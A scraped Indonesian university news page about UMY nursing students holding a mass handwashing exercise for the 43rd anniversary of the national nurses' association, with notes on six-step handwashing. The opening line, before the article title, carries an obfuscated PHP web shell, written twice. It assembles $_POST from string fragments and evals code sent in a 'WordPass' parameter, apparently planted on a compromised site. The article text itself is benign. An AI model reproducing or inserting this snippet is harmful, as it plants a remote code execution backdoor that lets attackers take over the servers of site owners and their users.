@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']); PSIK UMY Selenggarakan Senam Cuci Tangan Memperingati HUT PPNI | Keperawatan UMY

Sebanyak 250 mahasiswa Program Studi Ilmu Keperawatan (PSIK) UMY secara serentak melakukan senam cuci tangan di pelataran Sportorium pada Jum’at (17/3). Kegiatan ini dalam rangka merayakan Hari Ulang Tahun (HUT) Persatuan Perawat Nasional Indonesia (PPNI) ke 43 tahun, yang juga serentak dilakukan oleh perawat di seluruh Indonesia.

Hal ini seperti dinyatakan oleh Penanggung Jawab acara, Yuni Astuti, M.Kep.,Ns.,Sp.Kep.Mat. “Acara ini dalam rangka memperingati HUT PPNI ke 43. Seluruh Perawat di Indonesia juga melakukan senam cuci tangan ini. Dan kami mengerahkan empat angkatan yaitu dari angkatan 2013 sampai 2016, dosen dan assisten dosen PSIK untuk mengikuti acara ini,”jelasnya.

Selain melakukan senam cuci tangan, mahasiswa dan dosen PSIK juga mengedukasi civitas akademika tentang pentingnya mencuci tangan yang baik dan benar.“Setelah senam, kami juga mengedukasi civitas akademika UMY untuk mencuci tangan dengan 6 langkah dengan mendatangi gedung-gedung yang ada di UMY. Kami membagi mahasiswa menjadi dua yaitu untuk kampus sisi selatan dan utara,”tuturnya.

6 langkah cuci tangan yang baik dan benar yaitu dimulai dengan memutar telapak tangan kemudian punggung tangan, sela-sela jari, lalu gosok punggung jari hingga ke sela-sela. Kemudian bilas ibu jari secara berputar bergantian dengan ujung jarinya.

Seperti di gambar

Berikut ini cara lengkap mencuci tangan yang baik menurut World Health Organization (WHO):

Yuni melanjutkan bahwa saat ini masih banyak yang belum tahu tentang 6 langkah cuci tangan tersebut, padahal penelitian menunjukkan mencuci tangan dengan 6 langkah tersebut lebih efektif mencegah infeksi. “Petugas kesehatan biasanya hanya mengajarkan 6 langkah cuci tangan kepada pasien di rumah sakit dan keluarga yang menunggu di Rumah Sakit. Faktanya masih banyak masyarakat umum di luar Rumah Sakit yang belum tahu,”lanjutnya.

“Mencuci tangan sangat mudah dilakukan tapi masyarakat saat ini belum melakukannya dengan tepat atau malah abai dengan hal yang dianggap sepele ini. Padahal tangan merupakan pintu awal masuknya bakteri dan virus ke tubuh. Jadi kalau kita tidak mencuci tangan kita dengan baik apalagi saat kotor,tentu saja berdampak pada kesehatan tubuh kita,”pungkasnya. (A.R)

 

 

Dikutip dari : http://www.umy.ac.id/peringati-hut-ppni-psik-umy-adakan-senam-cuci-tangan.html